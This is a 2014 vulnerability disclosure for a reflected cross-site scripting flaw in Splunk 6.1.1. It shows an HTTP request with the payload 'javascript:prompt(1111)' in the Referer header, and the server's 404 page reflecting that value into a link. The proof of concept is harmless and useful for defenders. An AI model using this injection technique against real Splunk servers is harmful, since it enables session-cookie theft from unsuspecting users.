================================================================================================================================================================
 
                  Splunk Version v6.1.1  cross-site scripting (XSS) Vulnerability
================================================================================================================================================================
 

#Date- 27/5/2014

# code by Asheesh kumar Mani Tripathi
 
     
 
# Credit by Asheesh Anaconda
 
 
 
#Vulnerbility
  Splunk is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
 
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities 
 
 
========================================================================================================================
 
                                                           Request
========================================================================================================================

GET /en-US/app/ HTTP/1.1
Referer: javascript:prompt(1111);
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie: session_id_8000=9961be37412131609c9c4942a7bca65cc5110e6c; cval=1992808981; uid=C39F57A0-4BFB-4CD7-AAA1-4FD388E15923
Host: 192.168.1.3:8000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*



========================================================================================================================
 
                                                           Response 
========================================================================================================================





<html xmlns="http://www.w3.org/1999/xhtml" xmlns:splunk="http://www.splunk.com/xhtml-extensions/1.0" xml:lang="en">
<head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/en-US/static/@207789/img/favicon.ico" />
    <title>The path '/en-US/app/' was not found. - Splunk</title>
    <style>
    
        *       { margin: 0; padding: 0; }
        body    { font-family: helvetica, arial, sans-serif; color: #333; padding: 20px; }
        p,pre   { margin-bottom: 1em; font-size: .8em; }
        .status { font-size: .7em; color: #999; margin-bottom: 1em; }
        .msg    { margin-bottom: 1em; font-size: 1.4em;}
        pre     { font-family: Monaco,Courier Bold,Courier New,monospace; font-size: .7em;background-color: #eee;  padding: 5px;}
        #toggle { font-size: .8em; margin-bottom: 1em; }
        .byline { color: #555; }
        .byline span { font-weight: bold; line-height: 1.4em; }
        hr      { height: 1px; background-color: #ccc; border: 0; margin: 20px 0 10px; }
        h2      { font-size: 1em; margin-bottom: 1em; }
        table   { border-collapse: collapse; }
        td      { padding: 2px; }
        td.k    { font-family: helvetica, arial, sans-serif; font-weight: bold; }
        #debug  { display: none; }
        
        #crashes { margin: 20px 0; padding: 10px; border: 1px solid #800; }
        #crashes dt { font-size: 12px; margin-bottom: 5px; }
        #crashes dd { white-space: pre; background: #f2f2f2; padding: 10px; margin-left: 20px; display: none; font: 10px Monaco,Courier Bold,Courier New,monospace; }
        
    </style>
    <script>
        function toggle(what) {
            what = document.getElementById(what);
            if (what.style.display == 'block') {
                what.style.display = 'none';
            } else {
                what.style.display = 'block';
            }
        }
    </script>
</head>
<body>
    <p class="status">404 Not Found</p>
    <p class="homelink"><a href="/">Return to Splunk home page</a></p>
    <h1 class="msg">The path '/en-US/app/' was not found.</h1>
    <a href="/en-US/app/search/search?q=index%3D_internal%20host%3D%22admin-PC%22%20source%3D%2Aweb_service.log%20log_level%3DERROR%20requestid%3D538456422b3c01ef0" target="_blank">View more information about your request (request ID = 538456422b3c01ef0) in Search</a>
    <br />
    <br />
    
    <p>This page was linked to from <a href="javascript:prompt(1111);">javascript:prompt(1111);</a>.</p>
    <br />
    <br />
    
 [... Redacted for Brevity ...]